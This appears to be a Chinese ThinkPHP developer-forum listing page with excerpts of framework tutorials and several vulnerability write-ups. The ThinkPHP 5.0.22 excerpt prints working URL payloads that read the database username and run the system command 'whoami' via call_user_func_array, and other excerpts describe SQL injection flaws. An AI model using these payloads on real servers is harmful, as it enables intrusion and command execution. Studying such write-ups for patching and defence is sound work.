日志

博文列表排序：最新更新热门推荐

ThinkPHP 3.1、3.2一个通用的漏洞分析 Author:m3d1t10n 前两天看到phithon大大在乌云发的关于ThinkPHP的漏洞,想看看是什么原因造成的。可惜还没有公开,于是就自己回来分析了一下。 0x00官方补丁(DB.class.php parseWhereItem($key,$val)) 注意红色框框起来的部分 0x01分析preg_match('/IN/i',$val[0]) //该正则没有起始符和终止符，xxxxinxxxxx等任意包含in的字符串都可以匹配成功，因而构成了注入 preg_match('/BETWEEN/i'

2023-03-29 23:03:03 阅读数870 评论数0
thinkphp6 怎样引入第三方类库 tp6 SDK引入 thinkphp6 怎样引入第三方类库 tp6 SDK引入 tp6怎样引入第三方类库如果是手动下载的sdk ，把sdk 放到 extend 目录下百度自然语言处理为例：在控制器引入 require_once ‘…/extend/aipbaidusdk/AipNlp.php’; 这样就已经成功引入咯

2023-03-29 23:03:03 阅读数214 评论数0
thinkphp 时间戳转为时间格式用实例化Model类的方法，从数据库里获取出来的时间戳，把它转换为时间格式，百度后用别人的方法写出来了，用{$item[‘checkout_time’]|date=“Y-m-d H:i:s”,###}，这里的 $item[‘checkout_time’]就是从数据库里面获取的时间戳，这样写就可以生成例如 20189-2-20 16:52:00的格式了或者写成

2023-03-29 23:03:03 阅读数316 评论数0
ThinkPHP5和ThinkPHP6的区别一、tp5和tp6的差异二、tp6主要的新特性

2023-03-29 23:03:03 阅读数231 评论数0
ThinkPHP错误日志记录最近在使用Think PHP3.2，发现设置APP_DEBUG=false，日志信息记录不全，类找不到，或者方法不存在等致命错误信息都没有记录。百度了一下，发现其他人也有这样的问题，时间还是2014年的。全盘搜索register_shutdown_function，错误处理函数register_shutdown_function('Think\Think::fatalError');源码如下： // 致命错误捕获static public function fatalError() {Log::

2023-03-29 23:03:03 阅读数242 评论数0
thinkphp5.0.22漏洞利用一、搭建环境 phpstudy的版本大于5.0 解压源码到www下浏览器访问 127.0.0.1/thinkphp/public/index.php 漏洞利用 ?s=.|think\config/get&name=database.username查看数据库的用户 ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoamiwhoami getshell poc?s=/i

2023-03-29 23:03:03 阅读数397 评论数0
ThinkPHP5 SQL注入（select方法） ThinkPHP5 SQL注入（select方法）漏洞概要初始配置漏洞利用漏洞分析漏洞修复攻击总结漏洞概要本次漏洞存在于 Mysql 类的 parseWhereItem 方法中，由于程序没有对数据进行很好的过滤，将数据拼接进 SQL 语句，导致 SQL注入漏洞的产生漏洞影响版本： ThinkPHP5全版本初始配置获取测试环境代码 composer create-project --prefer-dist topthink/think=5.1tpH3rmesk1t 将 composer.jso

2023-03-29 23:03:03 阅读数254 评论数0
ThinkPHP5.1 Where查询表达式查询表达式支持大部分的SQL查询语法： where('字段名','表达式','查询条件');whereOr('字段名','表达式','查询条件'); 手册上都有标注但是有些地方说的不是很清楚，比如LIKE查询或的方式同时查询多个字段模糊查询，如果想要字段1 LIKE "%aa%" OR 字段2 LIKE "%aa%" OR 字段3 LIKE "%aa%"....... 那么你可以这样写： $where[] = ['字段1|字段2|字段3','like',"%aa%"]; 下面是一些表达式

2023-03-29 23:03:03 阅读数225 评论数0
tp5.1 Warning: require(/www/wwwroot/kehu.xxxx.net/public/../thinkphp/start.php): failed to ........ 报错：Warning: require(/www/wwwroot/kehu.xxxxx.net/public/../thinkphp/start.php): failed to open stream: No such file or directory in /www/wwwroot/kehu.xxxxx.net/public/index.php on line 17 Fatal error: require(): Failed opening required '/www/wwwroot/kehu.x

2023-03-29 23:03:03 阅读数205 评论数0
thinkphp6异常处理与日志异常处理目标：返回json格式的异常信息 # url_route_must:true强制路由模式下 thinkphp6内置已了一个app\ExceptionHandle异常处理类可供使用该类绑定在app目录下面的provider.php文件中，直接修改该类的相关方法即可完成应用的自定义异常处理机制。 app\ExceptionHandle.php 异常处理类，重新定义render方法即可 #app\ExceptionHandle.php public function render($request
$异常处理目标：返回json格式的异常信息 # url_route_must:true强制路由模式下 thinkphp6内置已了一个app\ExceptionHandle异常处理类可供使用该类绑定在app目录下面的provider.php文件中，直接修改该类的相关方法即可完成应用的自定义异常处理机制。 app\ExceptionHandle.php 异常处理类，重新定义render方法即可 #app\ExceptionHandle.php public function render($request$

2023-03-29 23:03:03 阅读数216 评论数0

共 6126 条

一个专属于OneKeyAdmin的技术交流平台，记录OneKeyAdmin开发者的成长与进步。

主题帖

6221

回帖数

145

文章

-

评论

-

粉丝

-

1 WordPress Rest API 入门详解

2 Yandex企业邮箱注册

3 Thinkphp5.0 获取新增数据的ID

4 thinkphp5 解决跨域问题

5 Thinkphp6 的 where 查询条件 and 和 or 的操作

6 PHP的exec()函数用法详解

7 Vue3官网使用及简介

8 thinkphp6配置连接微软的sqlserver数据库

9 Thinkphp如何查看当前是哪个版本?查看thinkphp当前版本号的三种方法

10 thinkphp5使用数据库表锁